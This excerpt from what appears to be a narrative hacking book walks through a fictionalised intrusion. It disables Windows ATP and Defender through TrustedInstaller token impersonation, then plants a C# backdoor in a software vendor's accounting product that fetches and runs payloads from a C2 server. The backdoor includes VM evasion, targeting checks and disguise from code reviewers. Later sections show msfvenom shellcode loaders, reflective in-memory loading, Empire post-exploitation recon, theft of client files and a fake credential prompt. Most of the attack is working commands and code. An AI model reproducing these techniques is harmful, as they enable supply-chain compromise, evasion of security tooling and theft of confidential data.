Okay, time to get serious. Since the TrustedInstaller service is not

protected, we will try injecting a new thread into its process. This thread
could, for instance, spawn a new command line interpreter inheriting the
TrustedInstaller’s security token descriptor. In other words, we can
effectively impersonate Trusted Installer’s identity and privileges!

There are multiple ways to do this. Mimikatz has a token manipulation

module, the Empire project includes the Invoke-TokenManipulation.ps1
script, Meterpreter loads a version of Incognito in memory. However, all
of these tools are well-known attacking frameworks, and unless we apply
heavy obfuscation (which may not always work), ATP picks it up fairly
If we are going to do this, we need to build our own custom routine to
impersonate tokens—one that has not yet been digested by Windows
ATP as part of its learning data.

It may sound too complicated, but we do not have to start from

scratch. James Forshaw developed a very comprehensive set of tools to
interact with NT objects92. These tools implement NT structures and
wrappers around low-level Windows APIs to do all sorts of funky stuff like
listing semaphores, mutants, reading process, and, of course, playing
with security tokens!

We download the whole project from Github but only compile the two
modules NtObjectManager and NtApiDoNet93:

This yields two .NET DLLs called NtObjectManager.dll and

NtApiDoNet.dll which contain everything we need to impersonate

These DLLs do not trigger any antivirus alerts because they contain
legit Windows code and only define wrappers around low-level Windows
APIs. So, technically, we could just drop them on Strat Jumbo’s virtual
disk and we would totally get away with it. However, being the prudent
hackers that we are, we will opt for a clean in-memory loading.

We upload these DLLs into our C2 server and use the Load function
of the System.Reflection.Assembly class to dynamically load them in
memory. Again, this works because we are dealing with .NET assembly

93 You will need VisualStudio to easily compile the modules
#Setup browser object and proxy credentials as usual
PS C:\> $browser = New-Object System.Net.WebClient;
PS C:\> $browser.Proxy.Credentials=

#Download DLLs using the DownloadData function

PS C:\> $b =
PS C:\> $c = $browser.DownloadData("

#Load DLLs into memory

PS C:\> $d = [System.Reflection.Assembly]::Load($b)
PS C:\> $e = [System.Reflection.Assembly]::Load($c)

Next, we import the loaded assemblies just like we would import any
regular DLL or PowerShell script and thus access their plethora of nifty
little functions to manipulate .NET objects:

PS C:\> Import-module $d
PS C:\> Import-module $e

PS C:\ $e.GetExportedTypes()

We check out ATP’s dashboard. No alerts so far. Everything is going

as expected.

Great. Now we can start messing around with security tokens! First
things first, we acquire the SeDebugPrivilege to be able to interact with
system processes’ memory space:

#Grab the current token attached to this process

PS C:\> $Token = Get-NtToken -Primary

#Enable the SeDebugPrivilege

PS C:\>
rivilege", [NtApiDotNet.PrivilegeAttributes]"Enabled")

PS C:\> $Token.Privileges

Next, we launch the TrustedInstaller process and get a handle on its

process using Get-NtProcess:

PS C:\> start-service trustedinstaller

PS C:\> $p = Get-NtProcess -Name "TrustedInstaller.exe"

Now comes the final part. We will call the CreateProcess method
from the NtApiDotNet DLL to launch a command line interpreter with
TrustedInstaller.exe as its parent process. But before we do that, we
need to prepare three key parameters:

• The command line to execute. In this case, a simple cmd would

• The parent process, i.e., a handle to TrustedInstaller.exe.
• An option parameter (CreationFlags) to open a new console

Translating these parameters into NtApiDotNet structures looks like

the following:

#Create a new Win32ProcessConfig object to store process

PS C:\>$config = New-Object NtApiDotNet.Win32.Win32ProcessConfig

#Command line to execute

PS C:\> $config.CommandLine = "cmd"

#Creation flag 16 corresponds to a new console

PS C:\> $config.CreationFlags =

#Assign a trustedinstaller.exe as a parent process

PS C:\> $config.ParentProcess = $p
We feed this configuration to the CreateProcess function and
successfully spawn a new command line interpreter bearing
TrustedInstaller’s identity!

PS C:\> [NtApiDotNet.Win32.Win32Process]::CreateProcess($config)

From this new window, we can simply change DiagTrack’s binary

path, then stop the service altogether. We can do the same for the
WinDefend service to also disable the antivirus.

C:\Windows\System32> Sc config diagtrack binpath="hey"

C:\Windows\System32> Sc stop diagtrack

Finally! Good day, Windows ATP. This was fun!

**Tip 1**

Although we can stop WinDefend and DiagTrack, the Sense service is

tagged as a NOT_STOPPABLE on Windows RS3.

One way to disable it would be to use the same technique as before—

changing the binpath and then restarting the system.
On Windows RS2 build 14393, neither the Sense service nor DiagTrack
are marked as NOT_STOPPABLE. In fact, the DiagTrack service is not
even Light Protected, which means that any administrator could change
its binpath and thus thwart Windows ATP.

If for some reason, we cannot mess with the service properties, we can
always mess with the binaries names in the folder “C:\Program
Files\Windows Defender Advanced Threat Protection\” using our
elevated prompt with TrustedInstaller’s token.

By renaming the SenseCncProxy.exe file, for instance, ATP cannot share

its telemetry to the cloud service. It has the same effect as disabling

**Tip 2**

Since ATP heavily relies on the cloud to determine which behavior is

normal and which is not, an alternative route to get rid of it is to block
communication with Windows servers.

If the firewall is not managed by GPO, we could push rules blocking

communication to the following URLs:,, winatp-gw-,, winatp-gw-,,eu.vortex-,,
Perfecting the backdoor
We switch between multiple programmer accounts on Citrix sessions
until we find one that has a populated profile (a home folder filled with
personal documents, Firefox bookmarks, Firefox history, etc.). We are no
longer after credentials.

We are now looking for wiki files, documents explaining how

developers are organized, which tools they use for versioning, branching,
testing, etc. In short, we are searching for anything that can help us
understand the project management structure of Strat Jumbo.

We fire up Firefox using Jack’s account (from the SNOW dev group)
and go through his bookmark bar, but nothing stands out. However, his
Firefox’s history contains a substantial list of interesting links:

Instead of manually parsing these links through the web interface, we

retrieve the whole database storing these URLs located at:
ng>.default\places.sqlite”. It is much easier to browse it using a classic
SQLite client94 in our lab:

This gives us a nice picture of the most visited (and thus most
valuable) internal assets of Strat Jumbo. What seems to be a wiki website
(howto.stratjumbo.lan) appears in the top ten most-visited links. This
looks important!

We connect transparently to the wiki using Jack’s windows
credentials, then leisurely peruse the website, soaking up as much
information about Strat Jumbo’s internal gears as possible. The section
“For young squires” is particularly helpful as it extensively details the
internal organization, project code names, programming practices, and
the validation workflow that new implemented features go through before
being pushed to clients.

Roughly summed up, each of Strat Jumbo’s clients is managed by a

customer relationship manager (CRM). This CRM works with the client
on a work statement describing their needs in terms of business functions
(specific accounting features, tax forms, etc.).

Some of these features are available in the default product shipped to

the client. However, more often than not, custom features need to be
developed specifically for the client’s unique needs. One single core
product is thus forked as many times as necessary, each time
implementing different add-ons.

Each development team specializes in roughly one product, including

all of its custom add-ons. There may be cross-overs between team
members depending on the workload and the skill shortage.

The mapping of projects and code names is presented below. It

appears that our holy grail is to be found under project code name
Baelish! Of course, that makes perfect sense in hindsight.

Programmers are divided into two main teams: code writers and code
checkers. Code writers implement new functions and test them on
development servers to make sure the product runs smoothly.

When they flag a package as production-ready, a separate team

imports the new code into their “Quality Assurance” servers and runs a
test book agreed upon with the client. If everything works as expected,
they ship the new module on the next update.

Regular updates of core functions are roughly produced every twelve

months for all projects. Custom functions are, however, updated at the
client’s request. Depending on the client, this can range from one to six
To keep track of these multiple forks and software branches, Strat
Jumbo installed a local Gitlab repository, whose URL we also find in the
wiki: stratlab.stratjumbo.lan.

This is both a blessing and a curse, depending on how we choose to

see it. On the one hand, we can easily locate the branch dedicated to
G&S Trust and thus limit our backdoor to target only this specific

On the other hand, every modification we bring in to the code will be

logged to the database:

Sure, we can spend a couple more hours digging into this Gitlab
server looking for vulnerabilities, root passwords, database access, and
other funky stuff to erase trails of our activity, but it hardly is a worthwhile
investment when you think about it from a broader perspective.

No matter how much we manipulate the activity logs, the fact is that
when reviewing the timeline, the backdoor will appear sandwiched
between two versions. A clean one and a tainted one, giving a fair
estimate of the backdoor’s first appearance in the code.
We could retroactively disable logging altogether or tamper with
activity logs, but that would spark severe inquisition rather than delay it.

It is much more cost efficient to worry about the backdoor’s code

quality (ensure it passes non-regression tests, survives light manual
checks, does not slow down the product, etc.) than spend time looking
for a way to infiltrate the Gitlab database, especially with ATA and
QRadar still out there.

Now that we know that Baelish is the code name for the Strat
Accounting project, we reconnect to Citrix using Elise’s account as it
belongs to the Baelish domain group and is authorized to update Strat
Accounting’s code.

As stated previously, Strat Jumbo keeps separate branches for each

important client that needs (and pays) for custom modules. This helps us
limit the scope of our backdoor to G&S Trust and avoid infecting half of
the planet.

Strat Accounting’s code is mostly in C#, which plays right into our field
of expertise. We can whip out all the good tricks we explored previously,
from Reflection to executing PowerShell commands.

Our first order of business is to make sure that our backdoor gets
easily triggered by the user. Hiding it in an obscure menu increases its
stealthiness, but if said menu is visited once every six months by an intern
who missed a button, then it won’t help much.

Lately, for instance, the Export plugin, seems to receive a good deal
of attention from different programmers. Given the regular activity, we
could easily smuggle our code in here without being noticed. Perhaps
somewhere in the GUI initialization phase, for instance, to trigger the
backdoor as soon as the user loads the menu for the first time:

This implies, of course, that every time an accountant fires up Strat

Accounting and loads the export menu for the first time, we get a new
shell phoning home.
While I like shells as much as the next hacker, this behavior can
quickly get out of hand. What happens when we finish the job? What if
we find stealthier ways to achieve persistence once inside G&S Trust
networks? What if we change our minds and simply call-off the whole

No matter what the reason may be, we need a way to control this
beaconing behavior and shut it down if need be. The following workflow
seeks to address this predicament:

The first time the backdoor is executed on a given machine, it will first
check for a specific registry key located in “HKLM\

If a random value we chose beforehand, say “Version” is found, then

the backdoor terminates and the normal flow of execution continues. If
the registry key is not present, the backdoor activates and phones back

When/if we want to terminate the backdoor, we only need to create

this registry key and thus thwart future launches.


The snippets of code listed below will contain genuine comments to help
you follow along. A real backdoor usually contains bogus comments to
mislead code reviewers, as well as dead code that does nothing but
further blur the trail.

// legit code shown before


// beginning of backdoor code

// if registry key not present, continue to the backdoor
if (Valid_launch())

// legit code follows


// further down in the code. Define Valid_launch method

static private bool Valid_launch()

//Fetch a registry key value that would not exist on a normal
RegistryKey key =
if (key != null)
//If key “Version” is not found, return true and proceed
with the backdoor
if (key.GetValue("Version") == null)
return true;
return false;

The Valid_launch function returns a true or false statement

depending on the presence of the predefined registry key (Version). If
the road is clear (no registry key), it branches to the Custom_shape_ui
function to follow the backdoor’s execution path.

You might be wondering why we are not encrypting or obfuscating our

code. Is it really safe to leave it in the open like that for all to read?

Good point. The problem with obfuscation and encryption is that they
draw human attention. We are not fighting an automated SIEM here, we
are dealing with humans.

Security by obscurity may be a shitty concept on the defensive side,

but it is truly gold in the hacking business! Imagine coming across a code
5000-characters long spanning a single line, full of hexadecimal
characters and foulable symbols. Of course your brain will automatically
pick up this sudden heresy and demand investigation.

Normal-looking code, however, will most likely go unnoticed. There

are tens of thousands of lines of code in Strat Accounting, no single
programmer knows all of its internal gears by heart.

Moreover, the powerful programming mantra “if it ain't broke don't fix
it” shields us from hazardous changes by moody programmers on a late
Friday afternoon. If we further flag our code with a comment saying,
“important fix for order #9812301” or “client request N° 19823124”, we
should be more than fine.
Ideally, the backdoor should lay dormant through the usual tests and
checks performed by the Strat development team. A sudden spike in
network bandwidth, computing resources, or—god forbid—a crash,
would surely give us away, so we need to be very stealthy and pay close
attention to the code’s quality.

We position a couple of watchdogs that monitor information about the

environment running the software. It makes sense to only trigger the
backdoor when running on a good old physical laptop belonging to G&S
Trust, so that’s what we will check for first.

// include this directive at the start of the file

using System;
using System.Management;

// rest of the code

// [...]

// Check the environment before starting the backdoor logic

if (Valid_environment())

static private bool Custom_shape(){

// Previous code checking for the registry key
if (Valid_launch())

What kind of checks can the method Valid_environment perform to

determine if it is indeed running on a G&S Trust computer? The solution
is simple enough—we make it ask the computer itself.

Almost all companies brand their workstations by setting up unique

hostnames and, more specifically, including the company’s name in the
Organization property in the system’s general information. We can fetch
this value using the registry, but also by reading the
Win32_OperatingSystem class in Windows Management
Instrumentation (WMI). On a normal command line, we would type the
following command:

C:\> wmic os get Organization


However, using C# code, we need a few more lines to achieve the

same result:
static private bool Valid_environment()
ManagementObjectSearcher search = new
ManagementObjectSearcher("SELECT * FROM Win32_OperatingSystem");
foreach (ManagementObject obj in search.Get())
string name = obj["Organization"].ToString().Trim().ToLower();
if (!name.StartsWith("gs") || !name.StartsWith("g&s"))
return false;

We retrieve objects from the Win32_OperatingSystem class, then

fetch the Organization field through an iterated loop. Then, it is simply a
matter of string comparison to look for telltale signs indicating we are on
a G&S Trust computer. If it’s not the case, Valid_Environment returns a
false Boolean and the backdoor is not launched.

While this check may be sufficient to ensure execution only on a G&S

Trust machine, it does not account for all possible scenarios. What if Strat
Jumbo has access to G&S Trust machines to test their code before
shipping? What if G&S Trust test their code in a simulated, enclosed
environment before deployment? The possibilities are endless.

One way to address these issues is to add a couple of tests to ensure

that our code only runs on physical Windows laptops. This obviously
means boosting our backdoor so it can detect virtual environments
(VirtualBox, VMware, KVM95, etc.).

This is a hot topic in the malware and sandboxing communities alike.

One side is trying to dress up a virtual machine to behave and look
exactly like a physical machine.

In contrast, the other side is trying to tear down the fake paper wall by
looking at specific strings in services, processes, registry keys, or
comparing CPU execution cycles for telltale signs of virtualization. The
underlying logic, however, is almost always the same: looking for
discrepancies in a key physical component that is overlooked by the
virtualization software96.

One such interesting component is the monitor!

95 KVM is used by Google Cloud, AWS, Azure and most cloud providers
96 Interesting review of sandbox evasion techniques:
Listing the monitor manufacturer on a classic computer yields names
like Asus, Lenovo, Dell, or any other known brand.

However, the same commands executed on a virtualized computer

return a generic output like “(Standard monitor types)” or an empty string.
This gives us our second validity check (besides looking for the
company’s name), again using Windows Management Instrumentation.

static private bool Valid_environment(){

//check GSTrust string code

search = new ManagementObjectSearcher("SELECT * FROM

foreach (ManagementObject obj in search.Get())
string manu =

if (manu.Contains("standard") || manu.Contains("types") ||
manu == "" || manu.Contains("generic"))
return false;

The same discrepancy is observed when getting the graphic card’s

name. On a regular system, we would expect something like Intel, ATI,
NVIDIA, etc. however on a virtual server, we find specific hypervisor
adapters like “VirtualBox Graphics Adapter for Windows 8+” or “Microsoft
Basic Display Adapter”.

static private bool Valid_environment(){

//check GSTrust code + check monitor code

search = new ManagementObjectSearcher("SELECT * FROM

foreach (ManagementObject obj in search.Get())
string name = obj["Name"].ToString().Trim().ToLower();
if (name.Contains("mwa")97 || name.Contains("ualb") ||
name.Contains("basic") || name.Contains("adapter"))
return false;

97 To avoid tipping off the code reviewer, we search for “ualb” string instead of
“virtualbox”. The same for “mwa”, which corresponds to vmware.
//If none of the above checks work, Valid_environment returns
return true;

Again, it is simply a matter of string comparison.

These checks are not bulletproof, mind you. Real, hardened forensic
sandbox environments could easily bypass these checks by hiding
registry attributes and other CPU information. But, we do not want to fool
malware reversers, now do we? Our current priority is simply to go
unnoticed during classic non-regression tests and quality checks.

Technically speaking, the custom_shape_ui function bootstrapping

our backdoor after Valid_environment and Valid_launch is simply a few
lines of code to call back our C2 server and execute an even more
massive payload that will give us more flexibility, namely loading DLLs,
regular beaconing, downloading files, etc.

Say we opt for the Empire listener that we configured in Chapter 1.

We head to the usestager module and generate the corresponding
payload. The latest Empire project natively includes AMSI and Script
Block logging bypass routines. What’s not to love?

Empire) > Listeners

[*] Active listeners:
Name Host Delay/Jitter
---- ---- ------------
https_1 5/0.8

(Empire: listeners) > Usestager windows/launcher_bat

(Empire: windows/launcher_bat) > set Listener https_1
(Empire: windows/launcher_bat) > generate
[*] Stager output written out to: /tmp/launcher.bat
Incorporating this payload as it is in the Strat Jumbo’s source code
would obviously draw unnecessary attention. To conceal this blurb of
gibberish data, we will host the base64 encoded command on our C2
server (file name readme.txt), download the file on the fly from Strat
Accounting’s code, and then add its content as an argument to the
PowerShell executable file.

The code is heavily commented so do not hesitate to go through it and

experiment with it:

// [...]
// check if running on physical laptop before triggering backdoor
if (Valid_environment())

static private bool Custom_shape(){

// Previous code checking for the registry key
if (Valid_launch())
// Launch backdoor code defined below

Static private void Custom_shape_ui(){

string mystring ="";

//Use the default proxy registered on the system

System.Net.WebRequest.DefaultWebProxy.Credentials =

//Prepare the WebClient

WebClient myWebClient = new WebClient();

//Try and Catch block to avoid raising errors if connection

try {
mystring =
} catch(WebException e){ }

//If the download succeeds

if (mystring != "") {
//Create a new Powershell process
var p = new System.Diagnostics.Process();
p.StartInfo.FileName = "powershell.exe";

//Include our payload as an argument

p.StartInfo.Arguments = mystring;
p.StartInfo.UseShellExecute = false;
p.StartInfo.CreateNoWindow = true;
//End of custom_shape_ui()

Given that we launch a new (hidden) PowerShell.exe process, the

agent maintains connectivity, even though the user closes the Strat
Accounting software. So, we do not need to rush into the twenty or so
reverse shells to migrate into a new process.

That’s it, folks. Our work is done here! Around fifty lines of code added
sporadically here and there inside the tens of thousands of lines of
original code should grant us access to G&S Trust! Now it is just a matter
of time. The full code is available on Github (

While I am a fervent supporter of the PowerShell Empire project, I

would hate to leave the awesome Metasploit Framework98 aside—though
I resent the many tutorials, books and articles that present it as the
hacking tool to whip out at any engagement....It’s not.

So just to shoot some hoots, let’s say we would like to inject a

Meterpreter backdoor in Strat Accounting. How would we go about it?

First, we set up our listener and then perform the usual business of
linking a public redirector to this listener via SSH. I tend to go with the
reverse_winhttps payload as it automatically takes into account
corporate proxy settings pushed by GPO.

msf> use exploit/multi/handler

msf exploit(handler)> set payload
msf exploit(handler)> set LHOST
msf exploit(handler)> run

[*] Started HTTPS reverse handler on

[*] Starting the payload handler...

Next, using msfvenom, we generate the stager shellcode that will
download the Meterpreter agent and reflectively load it in memory. Pretty
standard99 except for the prepenmigrateprocess, which automatically
instructs Meterpreter to create and attach to a new Explorer.exe process
in case the user terminates Strat Accounting before we get a chance to
manually migrate to another process:

root@Lab:~# msfvenom -a x86 -p

LPORT=8443 prependmigrate=true prepenmigrateprocess=explorer.exe
-f csharp
Payload size: 984 bytes

byte[] buf = new byte[984] {

x53,0xff,0xd5 };

Executing these bytes of native assembly code requires the same

steps regardless of the higher-level language used VBA, C#, C++, Java,
etc. First, we allocate an executable memory region, then we copy the
shellcode to it and launch it as a new execution thread.

This logic is similar to most of msfvenom payloads100, so I will not

dwell on it too much, as the code is pretty well commented and a variant
of it has been covered in How to Hack Like a Pornstar:

using System.Threading.Tasks;
using System.Runtime.InteropServices;


static private void Custom_shape_ui()

//Shellcode of msfvenom
byte[] var = new byte[984] {

//Allocate memory with read write and execute flags

UInt32 funcAddr = VirtualAlloc(0, (UInt32)var.Length,

99 List of payloads we can generate using msfvenom


//Copy the buffer to memory

Marshal.Copy(var, 0, (IntPtr)(funcAddr), var.Length);
IntPtr hThread = IntPtr.Zero;
UInt32 threadId = 0;
IntPtr pinfo = IntPtr.Zero;

//Execute native code

hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref

/*Uncomment this line when testing in a standalone executable.

If prependmigrate=true in msfvenom, a wait value of 5000 ms
should be sufficient for the main process to terminate after
//WaitForSingleObject(hThread, 5000);

//Define static variables used in memory allocation

private static UInt32 MEM_COMMIT = 0x1000;
private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;

//Import virtuallloc function from Kernel32.dll to allocate memory

private static extern UInt32 VirtualAlloc(UInt32
lpStartAddr, UInt32 size, UInt32 flAllocationType, UInt32

//Import CreateThread function from Kernel32.dll

private static extern IntPtr CreateThread(
UInt32 lpThreadAttributes,
UInt32 dwStackSize,
UInt32 lpStartAddress,
IntPtr param,
UInt32 dwCreationFlags,
ref UInt32 lpThreadId

//Import WaitForSingleObject function from Kernel32.dll

private static extern UInt32 WaitForSingleObject(
IntPtr hHandle,
UInt32 dwMilliseconds
We end up with one hundred lines of code that are not so human-
friendly, from the long byte array containing the shellcode to the kernel32
imports that clearly stand out from the rest of Strat Accounting’s code.
Not to mention that any decent antivirus would immediately spot this
succession of bytes as part of the Meterpreter payload no matter how
much obfuscation/encoding we apply.

Fortunately, we can avoid these issues altogether with one amazing

property of C#—Reflection, the possibility to load assemblies on the fly!
We have already used this feature to disable ATP and we will use it once
more to load this pile of code into memory without touching the disk.

In order to use Reflection, we need to compile the previous C#

Meterpreter stager into a standalone executable file. To that end, we add
a couple of standard statements like wrapping the code in a public class
(called Program, for instance), adding a Main function and defining a
namespace (called shellcode). You can find a working template that is
ready to use on the book’s Github page (

Compiling this code into a standalone .NET executable is as

straightforward as calling the CSC executable on Windows:

C:\> C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
/unsafe /out:health-check shellcode.cs

Notice how the “health-check” executable is lacking the “.exe”

extension to avoid raising suspicion when hardcoding the URL in the
code later on. We upload this file to our C2 server and download it using
Webclient’s DownloadData function inside Custom_shape_ui():

using System.Net;
using System.Reflection;


static private void Custom_shape_ui()


//Array that will hold our assembly

byte[] myDataBuffer = null;
//Use the default proxy registered on the system
System.Net.WebRequest.DefaultWebProxy.Credentials =

//classic webclient object to download data

WebClient myWebClient = new WebClient();

try {
myDataBuffer =
} catch(WebException e){ }
//Download bytes from C2 domain

//If the download succeeds

if (myDataBuffer!= null) {
//Reflectively load it in memory
Assembly a = Assembly.Load(myDataBuffer);

Once we have the executable in a byte array, we pass it to the load

method of the Assembly class and invoke the Main method located inside
the Program class (which itself is located inside the namespace
shellcode, defined in the standalone code)

Type t = a.GetType("shellcode.Program");
MethodInfo staticMethodInfo = t.GetMethod("Main");

staticMethodInfo.Invoke(null, null);

//End of Custom_shape_ui() method


A dozen lines in total, instead of one hundred—not bad! Moreover, if

you quickly glance at the code, there is hardly anything suspicious about
its overall appearance. Exactly what we wanted (

Done. That’s about it, folks! Now comes the hard part—waiting!

Thanks to our many accounts involved in the Strat Accounting project,

we can connect from time to time to the repository and follow the project’s
timeline. If everything goes well, in just three to five weeks, it should be
raining shells!

Recall that in this alternative backdoor, we started out with a shellcode,
which we then included in a fully functioning C# code to produce a .NET
executable. But what if you’re already using a native PE executable file?

Ideally, we would like to follow the same logic, i.e., include this PE file
into a working C# code, compile it into a .NET executable, then load it
remotely using the assembly class.

There is more work involved to dynamically load a PE executable from

C# code (relocating the text segment, manually importing functions, etc.)
but don’t worry, you can use the following script from @Subtee
( to ease the process.

All you need is convert your PE file into a base64 string, copy and paste
it in a variable, then compile everything into a working .NET executable,
which you can later load via Reflection.
“Fell down on my knees and prayed
‘Thy will be done’.
I turned around, saw a light shining through.
The door was wide open.”

Glass Prison – Mike Portnoy (Dream Theater)

It has been three weeks since we injected that extra piece of code into
Strat Accounting’s next release. Every now and then we log into their
remote Citrix session to follow the project’s advancement, but like any
development project, the new release is running a few days late.

Our few lines of code are still deeply buried within the project’s native
code, and though the initialization instructions around it were altered a
couple of times, nobody bothered to change our piece of code, except for
this one additional comment:

So nice of them!

We leave it at that and wait a couple of more days. Then, one beautiful
Monday morning, we receive the much-anticipated first beacon from

root@FrontGun:~# whois

inetnum: -
netname: SINGNET-SG
country: SG

Is it a pilot run on a single G&S Trust workstation to test the update

before global rollout? Maybe. We give it a few more minutes and
nervously wait to see if this first beam of light will be cut off by some
security product spotting the beacon-like behavior.

Ten minutes... twenty... thirty minutes pass—and bam! Shells start

pouring in from two additional offices—Cyprus and Hong Kong. A couple
of hours later, to our great delight, Malta and the Seychelles islands join

(Empire: agents) > list

Name Internal IP Machine Name Username

672S4HKR WV0012 GSTRUST\sarah

All in all, a total of eight computers phoned back home over the last
few hours, all from all G&S Trust offices.

So far, so good!

Before diving any deeper into enemy lines, we have one immediate
goal: reconnaissance! We want to dig up any security product that could
be installed on machines or actively monitoring the network. Since all
systems beaconing appear to be Windows 10 machines, we start with
targeted commands to first determine if ATA and ATP are enabled:

(Empire: 7S92RXMZ) > shell tasklist /v | findstr /I sense

..Command execution completed.

(Empire: 7S92RXMZ) > use

(Empire: get_group) > set LDAPFilter "(description=*Threat*)"
(Empire: get_group) > run
Job started: G1TBWF

Get-DomainGroup completed!

Awesome! No hint of any global group named “Microsoft Advanced

Threat Analytics Administrators”, nor any process named “MsSense.exe”
(ATP). Moreover, G&S Trust seems to be using Symantec antivirus,
which does not support AMSI, so we can cross that one off as well!

Empire: 7S92RXMZ) > shell wmic process get name,executablepath

C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\
12.1.7369.6900\Bin\smcgui.exe smcgui.exe

We query ScriptBlockLogging and SystemWide transcript registry

keys only to see them disabled as well:

(Empire: 7S92RXMZ) > shell reg query

ERROR: The system was unable to find the specified registry key
or value.

(Empire: 7S92RXMZ) > reg query


ERROR: The system was unable to find the specified registry key
or value.

To recap, we have Windows 10 machines without some of the most

essential security features of this new release. Boy is this going to hurt!

We can now safely push the button a bit harder and go to full-blown
Active Directory reconnaissance. Empire keeps a transcript of all
commands, outputs and files downloaded in the
Empire/downloads/<Agent_name> folder, so I will not bother pasting the
full result below:

(Empire: 7S92RXMZ) > use

(Empire: get_group) > run

(Empire: 7S92RXMZ) > usemodule

(Empire: get_user) > run

(Empire: 7S92RXMZ) > usemodule

(Empire: get_ou) > run

(Empire: 7S92RXMZ) > usemodule

(Empire: get_computer) > run

(Empire: 7S92RXMZ) > usemodule

(Empire: share_finder) > run

We thoroughly review the list of groups and users, but nothing stands
out. There seems to be no security monitoring group, nor any generic
security team for that matter. We find regular technical accounts (backup,
activesync, build master, etc.) but none seem to belong to or be used by
a security product.
This is hardly surprising given the company’s size. They are not going
to subscribe to a Security Operation Center to cover five file servers,
twenty workstations and an Exchange server, much less deploy heavy
machinery to be operated by an IT support that can hardly deal with
Windows machines and printers.

All G&S Trust offices are tied to the same Active Directory domain.
This domain is managed by four global domain admins:

root@C2Server:~# cd Empire/downloads/7S92RXMZ
root@C2Server:~# grep -F3 "distinguishedname : CN=Domain
Admins" agent.log

name : Domain Admins

member :

The company’s domain is broken down into several Organization

Units, each one harboring users and machines from a different
geographical office.

root@C2Server:~# grep -A1 "objectcategory :

CN=Organizational-Unit" agent.log

objectcategory : CN=Organizational-
ou : HongKong
objectcategory : CN=Organizational-
ou : Malta

In a similar fashion, business groups seem to be partitioned by


root@C2Server:~# grep -A1 "GROUP_OBJECT" agent.log

samaccounttype : GROUP_OBJECT
samaccountname : SGAcctDrive
samaccounttype : GROUP_OBJECT
samaccountname : CSLegalDrive
samaccounttype : GROUP_OBJECT
samaccountname : VIP

This fine-grained breakdown hints to a tight access control applied to

AD objects, probably in an attempt to isolate shell companies of one
region from the remaining offices.

Hunting for data

All of the beacons we’ve got naturally come from the accounting
department of each regional office, which makes sense given our
intrusion vector.

This means that, theoretically, we already have access to all

accounting information hosted by G&S Trust. To target companies
registered in Hong Kong, for instance, we just need to find the right
accountant belonging to the right OU. In this case, it’s Yui.

Sometimes it is hard to find data, so we need to rely on tricks like

extracting the most recently used files stored in the
2\LastVisitedPidlMRU” registry key101, but we are not dealing with an IT
savvy user population here.

A quick look at the “My Documents” and “Desktop” folders spills the

(Empire: 7S92RXMZ) > cd c:\users\yui\documents


(Empire: 7S92RXMZ) > dir

LastWriteTime length Name
------------- ------ ----
3/11/2018 2:18:25 PM Desktop
3/8/2018 5:41:47 PM Documents
1/20/2018 10:32:49 PM Downloads
1/20/2018 10:32:49 PM Taxes_2017
1/20/2018 10:32:50 PM Accounting_2017

101 The following script could come in handy:
(Empire: 7S92RXMZ) > cd Accounting_2017; dir
LastWriteTime length Name
------------- ------ ----
3/11/2018 2:18:25 PM Hielo Corp.
3/8/2018 5:41:47 PM Ayomi Inc.
1/20/2018 10:32:49 PM Great Fund Yoa Corp.

Using the download command on Empire, we get tax returns,

expenses, travel receipts, and other accounting information regarding the
150 companies registered by G&S Trust in Hong Kong dating back to
2017. Not bad.

But we can do better.

Yui only keeps local copies of her most recent project; the rest of the
files must reside on a share somewhere in the Hong Kong office. We list
shares currently mounted on Yui’s workstation by calling the net use

(Empire: 7S92RXMZ) > shell net use

Status Local Remote Network

OK F: \\GS-HK-01\HKAccounting$ Microsoft Windows Network
OK G: \\GS-HK-01\YuiHome$ Microsoft Windows Network
OK W: \\GS-HK-01\Common$ Microsoft Windows Network

(Empire: 7S92RXMZ) > dir F:\

LastWriteTime length Name
------------- ------ ----
3/11/2018 2:18:25 PM 2017
1/2/2017 5:41:47 PM 2016
1/12/2016 10:32:49 PM 2015
1/10/2006 10:32:49 PM 2005

Bingo! Now we have accounting information dating back to 2005!

Much more interesting.

We follow the same approach to locate accounting information

pertaining to the other four locations: Cyprus, Seychelles, Singapore and
Accounting data gives us plenty of information about shell companies,
including their net income, source of revenue, type of expenses, number
of employees, transactions, salaries, and so forth, which can already help
reveal a couple of big corporations engaged in shady tax-evasion

While this information is certainly interesting, it will take a few months

to parse so we can pinpoint embezzlement schemes and other shady

Moreover, we still lack some crucial elements, like who are the real
people behind these corporations? Who are the end beneficiaries
shadowing the people behind the nominees running these corporations?
This is the core secret closely held by G&S Trust Corp.

In an attempt to find this information, we list all shares on the network

using the Empire share_finder module. Maybe, just like accounting, the
legal department keeps IDs and share certificates stored somewhere

(Empire: 7S92RXMZ) > usemodule


(Empire: share_finder) > run

Name Type Remark ComputerName

---- ---- ------ ------------
ExCom 114748390 GS-ML-01.gstrust.corp
HR 109127512 GS-ML-02.gstrust.corp
Legal 81051094 GS-ML-02.gstrust.corp
Accounting 252081194 GS-SC-01.gstrust.corp
Portfolio 612081294 GS-HK-01.gstrust.corp
NETLOGON 81190512 Logon serv... GS-ML-01.gstrust.corp
SYSVOL 81190512 Logon serv... GS-ML-01.gstrust.corp

Yui’s account gets denied access to all other folders (Legal, HR,
ExCom, etc.) except for the Accounting folder on the Hong Kong local
server. The strong secrecy required by their business has at least forced
them to implement tight access rules to counter obvious data leaks. Fair

Some privilege escalation is in order!

We look-up the 20 different interactive sessions we currently have,

but none of them has local or global admin privileges. We continue
probing by searching for other domain users with an admincount
property greater than “1” in Active Directory:

root@C2Server:~# cd Empire/downloads/7S92RXMZ
root@C2Server:~# cat agent.log | grep -B2 "admincount
: 1"
samaccountname : admin.georges
admincount : 181
samaccountname : Administrator
logonhours : {255, 255, 255, 255...}
admincount : 1091
objectsid : S-1-5-21-2894670206-2000249805-
samaccountname : admin.sarah
admincount : 191

Almost all admin accounts follow the same naming convention:

“admin.username”. And if you followed closely, you would notice that one
of our accountants in Cyprus has an admin account: admin.sarah!

Odds are, she uses the same password for her standard account as
well, but since we do not know that either, we have come to a dead end.

We can devise a dozen ways to get that password though, from

keylogging to looking through her personal files and folders, after all, we
have a working shell on her workstation.
However, the quickest way is to obtain an admin shell on her
computer, is to politely ask Sarah herself using the privesc/ask module.
This module pops the familiar Windows dialog box asking for elevated
credentials. Usually, people in a hurry to get back to their YouTube video
or Facebook activity gracefully comply, no questions asked:

